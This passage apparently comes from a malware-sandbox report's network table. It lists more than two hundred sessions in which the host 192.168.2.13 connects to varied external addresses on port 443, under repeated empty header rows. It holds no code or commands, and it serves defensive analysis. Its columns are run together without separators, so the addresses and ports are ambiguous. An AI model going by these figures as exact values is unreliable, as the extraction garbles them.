                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16560192.168.2.1351366202.237.127.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16561192.168.2.1342220173.235.160.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16562192.168.2.1353536163.222.152.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16563192.168.2.1346160140.29.217.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16564192.168.2.135589414.41.224.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16565192.168.2.1338710184.176.219.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16566192.168.2.133278440.35.228.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16567192.168.2.135290663.96.102.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16568192.168.2.1346692165.130.120.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16569192.168.2.135575246.44.114.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16570192.168.2.1358320137.164.23.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16571192.168.2.1335812211.219.19.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16572192.168.2.1341084188.227.146.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16573192.168.2.1346944131.113.187.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16574192.168.2.135105636.30.32.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16575192.168.2.1336246187.44.8.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16576192.168.2.134922880.167.40.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16577192.168.2.1341526134.229.141.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16578192.168.2.1359732149.50.225.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16579192.168.2.1350230120.7.22.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16580192.168.2.133741685.202.114.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16581192.168.2.1342404117.192.131.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16582192.168.2.1346784173.143.140.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16583192.168.2.1334396132.113.251.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16584192.168.2.13605864.212.187.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16585192.168.2.1343334178.90.54.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16586192.168.2.1333486180.190.85.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16587192.168.2.1333726158.247.89.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16588192.168.2.133668827.172.30.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16589192.168.2.1356544180.168.86.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16590192.168.2.1337250161.66.115.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16591192.168.2.1335974200.234.211.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16592192.168.2.134343444.250.152.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16593192.168.2.1343674190.244.151.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16594192.168.2.1352638119.192.108.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16595192.168.2.135096487.31.51.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16596192.168.2.1357538103.174.148.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16597192.168.2.1337218188.17.49.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16598192.168.2.135996445.105.232.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16599192.168.2.1354142223.65.207.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16600192.168.2.1337350131.154.18.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16601192.168.2.1355306168.203.92.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16602192.168.2.1359158199.132.136.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16603192.168.2.1332874202.185.136.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16604192.168.2.1338092143.164.83.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16605192.168.2.1337146107.90.70.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16606192.168.2.1348246144.123.136.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16607192.168.2.1343352184.87.88.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16608192.168.2.1344050119.100.51.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16609192.168.2.135421265.209.42.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16610192.168.2.1359366213.37.181.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16611192.168.2.135493482.29.174.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16612192.168.2.1360892165.139.144.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16613192.168.2.1341242176.219.151.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16614192.168.2.133664264.53.49.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16615192.168.2.1355972223.80.9.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16616192.168.2.135033886.86.189.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16617192.168.2.1341070147.98.77.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16618192.168.2.134126445.189.203.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16619192.168.2.1358626141.99.37.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16620192.168.2.1350118195.230.119.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16621192.168.2.1343636221.32.208.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16622192.168.2.135263270.6.101.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16623192.168.2.1355882201.104.52.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16624192.168.2.1345844190.229.8.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16625192.168.2.1360336148.113.57.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16626192.168.2.133509673.118.202.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16627192.168.2.135185894.178.64.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16628192.168.2.135883298.75.124.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16629192.168.2.1335284196.157.211.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16630192.168.2.134193053.174.213.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16631192.168.2.134908267.163.219.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16632192.168.2.133450212.18.98.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16633192.168.2.1349478216.121.68.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16634192.168.2.1350502147.48.53.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16635192.168.2.1343780182.86.254.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16636192.168.2.1350164116.204.21.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16637192.168.2.1346206100.8.87.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16638192.168.2.1352016139.7.77.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16639192.168.2.135710647.105.72.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16640192.168.2.135300436.103.19.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16641192.168.2.1343712133.214.166.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16642192.168.2.134439813.70.190.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16643192.168.2.136084881.144.38.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16644192.168.2.135488277.52.175.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16645192.168.2.135960096.189.80.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16646192.168.2.1351740151.48.246.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16647192.168.2.1359532124.194.95.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16648192.168.2.1355770209.129.26.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16649192.168.2.1341252217.69.2.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16650192.168.2.1341142175.191.225.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16651192.168.2.135384843.5.253.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16652192.168.2.1336638112.120.124.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16653192.168.2.1349742189.159.226.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16654192.168.2.134963243.110.199.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16655192.168.2.133607258.3.166.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16656192.168.2.1354270131.81.153.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16657192.168.2.1340150212.15.195.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16658192.168.2.133661449.173.65.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16659192.168.2.1352526104.201.241.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16660192.168.2.1337018152.35.229.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16661192.168.2.1355918125.101.37.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16662192.168.2.1339880156.56.36.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16663192.168.2.135004463.35.206.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16664192.168.2.1350032199.10.98.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16665192.168.2.1335820210.25.171.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16666192.168.2.133752674.141.36.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16667192.168.2.133861096.166.253.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16668192.168.2.135663677.158.77.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16669192.168.2.1350142148.39.16.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16670192.168.2.1337452173.162.41.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16671192.168.2.1357522154.173.118.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16672192.168.2.1339298151.172.219.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16673192.168.2.1358408182.247.110.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16674192.168.2.133676676.240.75.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16675192.168.2.134540618.149.234.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16676192.168.2.1357100104.22.176.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16677192.168.2.135649076.84.185.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16678192.168.2.134408286.190.254.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16679192.168.2.1359490211.196.238.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16680192.168.2.134798235.191.134.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16681192.168.2.135734074.110.243.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16682192.168.2.1352944159.107.226.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16683192.168.2.1351644108.19.77.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16684192.168.2.1346828112.4.147.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16685192.168.2.1353594160.106.137.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16686192.168.2.1343364157.222.255.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16687192.168.2.1335936152.87.61.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16688192.168.2.135332647.125.106.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16689192.168.2.133341294.221.31.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16690192.168.2.135068076.197.111.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16691192.168.2.13462461.130.97.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16692192.168.2.135567444.247.26.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16693192.168.2.134827699.211.126.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16694192.168.2.1339918217.154.100.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16695192.168.2.1360022107.239.59.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16696192.168.2.1337364151.33.0.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16697192.168.2.1336596168.246.3.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16698192.168.2.1340728223.211.239.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16699192.168.2.135764231.200.114.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16700192.168.2.1343846121.157.234.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16701192.168.2.1340224108.28.150.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16702192.168.2.135726413.187.61.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16703192.168.2.1342316173.163.78.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16704192.168.2.134057487.47.19.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16705192.168.2.135545683.7.150.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16706192.168.2.1359764156.58.41.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16707192.168.2.1343200218.173.47.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16708192.168.2.1344186174.246.96.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16709192.168.2.1347040120.207.209.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16710192.168.2.133503820.121.32.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16711192.168.2.13502925.32.184.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16712192.168.2.133744245.203.131.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16713192.168.2.1352248139.5.125.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16714192.168.2.1348282156.156.210.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16715192.168.2.1359776146.13.24.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16716192.168.2.1334388211.48.83.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16717192.168.2.1357710158.8.223.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16718192.168.2.1347688174.75.127.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16719192.168.2.1359078132.228.163.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16720192.168.2.1350632102.107.127.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16721192.168.2.134129040.198.122.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16722192.168.2.13530102.245.117.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16723192.168.2.1334650110.181.84.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16724192.168.2.1355244130.197.179.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16725192.168.2.133963673.101.26.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16726192.168.2.1343788163.105.98.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16727192.168.2.133584288.176.85.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16728192.168.2.134980266.223.123.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16729192.168.2.135589846.56.43.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16730192.168.2.133925475.170.127.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16731192.168.2.1348152192.179.46.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16732192.168.2.133504853.143.146.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16733192.168.2.1338208144.192.171.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16734192.168.2.1350776197.174.86.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16735192.168.2.135271240.98.149.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16736192.168.2.1332866104.157.212.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16737192.168.2.135359689.186.82.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16738192.168.2.134127893.134.109.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16739192.168.2.1348752213.163.58.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16740192.168.2.1336412157.34.91.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16741192.168.2.133312449.153.201.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16742192.168.2.1348454136.207.3.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16743192.168.2.1333754123.35.128.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16744192.168.2.135310472.234.142.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16745192.168.2.1354388107.250.221.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16746192.168.2.133908276.218.149.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16747192.168.2.1352170100.235.215.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16748192.168.2.13446921.205.183.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16749192.168.2.1347930113.164.241.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16750192.168.2.1341540217.21.108.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16751192.168.2.1351220111.190.99.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16752192.168.2.1349186166.241.53.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16753192.168.2.134362460.66.5.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16754192.168.2.134613241.30.220.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16755192.168.2.133550887.7.241.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16756192.168.2.1347286195.182.112.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16757192.168.2.1353280118.248.201.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16758192.168.2.134561244.249.209.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16759192.168.2.1355628156.241.40.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16760192.168.2.1340328173.210.99.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16761192.168.2.1355646206.48.141.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16762192.168.2.135126271.209.171.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16763192.168.2.133321866.49.198.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16764192.168.2.1339160125.104.134.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16765192.168.2.135932850.186.202.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16766192.168.2.134972493.30.34.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16767192.168.2.133847854.20.222.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16768192.168.2.1358342209.20.41.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16769192.168.2.1334798137.216.137.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16770192.168.2.1335800180.166.39.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16771192.168.2.1337306160.224.248.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16772192.168.2.1346258176.30.7.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16773192.168.2.1343028182.99.206.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16774192.168.2.134657697.63.29.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16775192.168.2.135146095.74.225.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16776192.168.2.133780057.118.117.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16777192.168.2.134983886.20.174.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16778192.168.2.134987235.111.227.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16779192.168.2.1355824206.176.53.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16780192.168.2.1339200113.134.223.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
